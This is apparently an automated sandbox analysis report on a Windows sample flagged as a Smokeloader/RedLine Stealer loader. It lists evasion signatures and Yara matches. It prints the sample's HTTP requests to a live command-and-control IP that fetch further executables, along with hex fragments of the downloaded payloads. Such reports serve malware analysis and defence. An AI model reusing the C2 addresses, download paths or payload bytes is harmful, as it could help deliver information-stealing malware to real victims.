Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1574319
MD5:cfc94b958cba743ed8b273401e37c465
SHA1:6abb6112d7bcee3f5ca9837ad3f0a0016267fc63
SHA256:501c477f13b6aef38fa11de85507a55863f99d0cde075879c9c6eab4cf11572f
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CFC94B958CBA743ED8B273401E37C465)
    • WerFault.exe (PID: 8072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 580 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x10d0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
Antivirus detection for URL or domain
Source: http://80.82.65.70/files/download.Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exeReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: file.exeReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D13817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04D13817
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 07:36:30 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 07:36:32 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox ViewIP Address: 80.82.65.70 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000003.2403846656.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403411485.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.
Source: file.exe, 00000000.00000002.2667518035.0000000005460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp=Ee
Source: file.exe, 00000000.00000002.2667518035.0000000005460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empWD
Source: file.exe, 00000000.00000003.2348586840.0000000005474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download
Source: file.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/key
Source: file.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/keyN
Source: file.exe, 00000000.00000003.2403411485.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files
Source: file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127311530.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152495724.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202839902.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101913818.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download
Source: file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download.
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/download
Source: file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download6
Source: file.exe, 00000000.00000002.2665430518.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download8yb
Source: file.exe, 00000000.00000003.2348586840.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278951429.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177695889.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313770429.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253670934.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228425864.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127385618.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152495724.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202839902.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101913818.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadA
Source: file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadJCZ
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadM5
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadQ5
Source: file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadV
